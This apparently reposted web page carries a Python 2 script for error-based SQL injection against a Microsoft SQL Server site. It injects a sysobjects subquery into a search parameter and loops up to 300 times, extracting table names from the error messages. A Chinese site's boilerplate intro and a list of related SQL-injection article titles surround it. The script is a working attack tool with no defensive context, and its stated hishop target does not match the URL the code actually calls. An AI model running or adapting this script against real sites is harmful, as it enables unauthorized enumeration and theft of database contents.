mssql-注入脚本

Posted 2021-06-05 射满东城湖

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了mssql-注入脚本相关的知识，希望对你有一定的参考价值。

#coding:utf-8
#Author:LSA
#Description:hishop sqli for /user/UserRefundApply?OrderId=
#Date:20190701
import sys
import requests
from bs4 import BeautifulSoup
import re
headers = {
\'Cookie\': \'\',
\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/75.0.3770.100 Safari/537.36\'
}
global tables_name
tables_name = "\'XWCMFLOWACTION\'"
#print tables_name
def brute_tables(url):
for i in range(0,300):
url = \'http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(\' + tables_name + \'))%3E0--\'
print url
rsp = requests.get(url,headers=headers)
soup = BeautifulSoup(rsp.text,"lxml")
title = soup.p.text
print title
table_name = re.findall(r"\'(.*?)\'",title)
print table_name
print table_name[0]
global tables_name
tables_name = tables_name + \',\\\'\' + table_name[0] + \'\\\'\'
print tables_name
def main(url):
brute_tables(url)
if __name__ == \'__main__\':
url = \'http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(\' + tables_name + \'))%3E0--\'
main(url)

以上是关于mssql-注入脚本的主要内容，如果未能解决你的问题，请参考以下文章

详解基于MSSQL “order by”语句报错的SQL注入技术

网络安全从入门到精通 (第五章-3) MSSQL反弹注入

MSSQL注入-显错注入及反弹注入

sql MSSQL片段

以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响？

MSSQL SQL注入